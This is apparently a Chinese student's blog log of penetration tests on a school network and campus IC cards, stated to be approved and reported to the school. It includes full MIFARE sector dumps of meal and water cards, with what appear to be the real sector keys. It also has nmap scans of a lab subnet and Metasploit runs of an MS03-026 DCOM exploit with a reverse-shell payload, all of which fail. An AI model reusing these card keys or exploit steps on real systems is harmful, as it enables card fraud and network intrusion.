2.11.10:28
前提说明:这里的入侵指的是,测试相关漏洞(并不进行相关的入侵以及攻击),事后会上报学校相关部门,当然如果是本校的小伙伴就不用再试了,漏洞扫出来之后会第一时间上报学校,再写文记录。
因为不知道会不会成功,所以一边渗透一边写文吧。
为了渗透学习我特地买了一台kali掌上电脑和一份投影键盘以及Digispark开发板。(当然我们高中并不允许手机入内,此处渗透皆是在学校假期时期完成的)
渗透思路
badusb的使用
kali msf相关渗透
相关端口漏洞及其利用
远程服务器需要
在机房使用kali的Nmap指令进行网段扫描。
注:渗透前会向学校申请。
校园一卡通的渗透,由于校园食堂使用的是一卡通IC卡,所以打算进行渗透。
卡是智慧一卡通的 (PN532)
![](https://img-blog.csdnimg.cn/img_convert/6f5c83716ed5271bd7fe3d22b554007c.png)
下面是一些渗透出来的数据仅供学习使用,(这里就不讲漏洞的利用与IC卡的爆破了,防止被非法利用)
扇区 0
3e 93 d1 3e 42 08 04 00 03 3f 76 d1 4e d1 cf 1d
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 1
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 2
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 3
00 05 f0 ff fa 0f 00 01 2c 04 26 00 01 66 00 bb
00 3f 0d 58 00 00 01 b9 f9 bd f0 20 20 20 20 84
00 00 00 00 00 50 08 31 00 00 00 00 01 00 00 8a
b2 01 8c 08 d3 0a ff 07 80 69 b2 01 8c 08 d3 0a
扇区 4
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 5
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 6
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 7
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 9
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 10
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 11
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 12
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 13
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 14
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
扇区 15
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
d0 8e 29 a2 01 8f ff 07 80 69 d0 8e 29 a2 01 8f
水卡数据
扇区 0
39 8a da 06 6f 08 04 00 03 3a c3 e1 22 13 8a 91
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 1
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 2
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 4
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 5
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 6
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 7
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 9
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 10
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 11
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 12
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 13
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 14
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
扇区 15
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
下面是机房kali扫描出来的数据
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:07 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00019s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00073s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00054s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00030s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00082s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00075s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00021s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
Host is up (0.00098s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00020s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00015s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00056s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00067s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00078s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00025s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 5.66 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00040s latency).
Not shown: 8885 filtered tcp ports (no-resposernse)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 22.55 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:23 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:27 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
\
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search dcom
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/nimsoft/nimcontroller_bof 2020-02-05 excellent Yes CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
1 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
2 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
3 exploit/windows/http/dnn_cookie_deserialization_rce 2017-07-20 excellent Yes DotNetNuke Cookie Deserialization Remote Code Excecution
4 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Yes MS03-026 Microsoft RPC DCOM Interface Overflow
5 exploit/windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow
6 auxiliary/scanner/telnet/telnet_ruggedcom normal No RuggedCom Telnet Password Generator
7 auxiliary/admin/dcerpc/samr_computer normal No SAMR Computer Management
8 auxiliary/scanner/http/symantec_brightmail_ldapcreds 2015-12-17 normal No Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability
9 auxiliary/scanner/http/symantec_brightmail_logfile 2012-11-30 normal No Symantec Messaging Gateway 9.5 Log File Download Vulnerability
10 exploit/windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC
11 exploit/windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)
Interact with a module by name or index. For example info 11, use 11 or use exploit/windows/local/ms16_075_reflection_juicy
msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options]
[-] Invalid parameter "options]", use "show -h" for more information
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs
/using-metasploit/basics/using-metasploit.html
RPORT 135 yes The target port (TCP)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
View the full module info with the info, or info -d command.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set LHOSTS 192.168.2.208
[-] Unknown datastore option: LHOSTS. Did you mean LHOST?
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exit
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) >
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.2.208 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::3103:3e0a:d4e8:8ef8 prefixlen 64 scopeid 0x20<link>
ether f4:4d:30:51:d6:df txqueuelen 1000 (Ethernet)
RX packets 93 bytes 16309 (15.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65 bytes 10441 (10.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root㉿kali)-[/home/kali]
└─# Namp -sP 192.168.2.0/24
Command 'Namp' not found, did you mean:
command 'wamp' from deb python3-autobahn
command 'pamp' from deb paml
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# apt-get install Namp
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package Namp
┌──(root㉿kali)-[/home/kali]
└─# apt-get install namp
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package namp
┌──(root㉿kali)-[/home/kali]
└─# Nmap -sP 192.168.2.0/24
Command 'Nmap' not found, did you mean:
command 'gmap' from deb gmap
command 'nmap' from deb nmap
command 'zmap' from deb zmap
command 'tmap' from deb emboss
command 'umap' from deb libunicode-map8-perl
command 'pmap' from deb procps
command 'amap' from deb amap
command 'amap' from deb amap-align
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# apt-get install nmap
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nmap is already the newest version (7.93+dfsg1-0kali2).
nmap set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.2.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:07 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00019s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00073s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00054s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00030s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00082s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00075s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00021s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
